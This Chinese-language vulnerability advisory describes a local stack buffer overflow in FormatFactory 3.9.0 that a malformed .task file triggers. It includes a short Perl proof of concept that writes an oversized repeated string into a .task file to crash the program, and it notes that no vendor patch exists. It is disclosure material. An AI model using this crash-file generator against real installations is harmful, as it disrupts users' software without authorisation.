发布日期：2016-09-01
更新日期：2016-09-05

受影响系统：

FormatFactory FormatFactory 3.9.0

描述：

---

FormatFactory是音频、视频、图形文件类型转换软件。

FormatFactory 3.9.0版本存在本地栈缓冲区溢出漏洞。加载文件(.task)中的错误验证检查导致栈溢出，可使受影响程序崩溃。

<*来源：ZwX
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

ZwX （）提供了如下测试方法：

Exploit Code (Perl)
#!/usr/bin/perl
my $Buff = "x41" x 5000;
open(MYFILE,'>>FormatFactory.task');
print MYFILE $Buff;
close(MYFILE);
print "PoC by ZwX";

建议：

---

厂商补丁：

FormatFactory
-------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.pcfreetime.com/CN/index.html

浏览次数：2704
严重程度：0（网友投票）